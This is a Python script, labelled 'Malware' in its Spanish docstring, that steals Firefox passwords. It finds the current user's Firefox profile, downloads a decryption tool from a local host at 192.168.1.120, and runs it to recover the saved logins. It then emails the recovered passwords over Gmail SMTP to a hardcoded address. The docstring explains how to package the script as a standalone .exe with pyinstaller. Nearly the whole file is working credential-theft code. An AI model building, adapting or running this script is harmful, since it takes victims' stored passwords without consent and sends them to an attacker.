#!/usr/bin/env python3
# coding: cp850
"""
Malware - firefox_decrypt.py

Firefox Decrypt https://github.com/unode/firefox_decrypt

La construcción del ejecutables es con pyinstaller y se ejecuta así:

pyinstaller --oneline malware.py

Para que funcione el .exe se debe harcodear el password y no usar dotenv

"""

import dotenv
import os
import requests
import subprocess
import sys
import smtplib
import tempfile
from email.mime.text import MIMEText


def run_command(command):
    """
    Ejecutor de comandos
    """

    try:

        output_command = subprocess.check_output(command, shell=True)

        return output_command.decode('cp850').strip()

    except Exception as e:

        print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")

        return None


def send_email(subject, body, sender, recipients, password):
    """
    Envia un email con el reporte de teclas presionadas
    """

    msg = MIMEText(body)
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = ', '.join(recipients)

    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:

        smtp_server.login(sender, password)
        smtp_server.sendmail(sender, recipients, msg.as_string())

    print(f"[i] Email sent Successfully!\n")


def get_firefox_profiles(username):

    path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"

    try:
        profiles = [profile for profile in os.listdir(
            path) if "release" in profile]

        return profiles[0] if profiles else None

    except Exception as e:

        print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")

        return None


def get_firefox_passwords(username, profiles):

    r = requests.get("http://192.168.1.120/firefox_decrypt.py")

    temp_dir = tempfile.mkdtemp()

    os.chdir(temp_dir)

    with open("firefox_decrypt.py", "wb") as f:

        f.write(r.content)

    command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"

    passwords = run_command(command)

    os.remove("firefox_decrypt.py")

    return passwords


if __name__ == '__main__':

    username_str = run_command("whoami")
    username = username_str.split("\\")[1]

    profiles = get_firefox_profiles(username)

    if not username or not profiles:

        sys.exit(
            f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")

    passwords = get_firefox_passwords(username, profiles)

    if passwords:

        dotenv.load_dotenv()
        app_passwd = os.getenv("APP_PASSWD")

        send_email(
            "Decrypted Firefox Passwords INFO",
            passwords,
            "keyloggerseginf@gmail.com",
            ["keyloggerseginf@gmail.com"],
            app_passwd
        )

    else:

        print(f"[!] No se han encontrado contraseñas")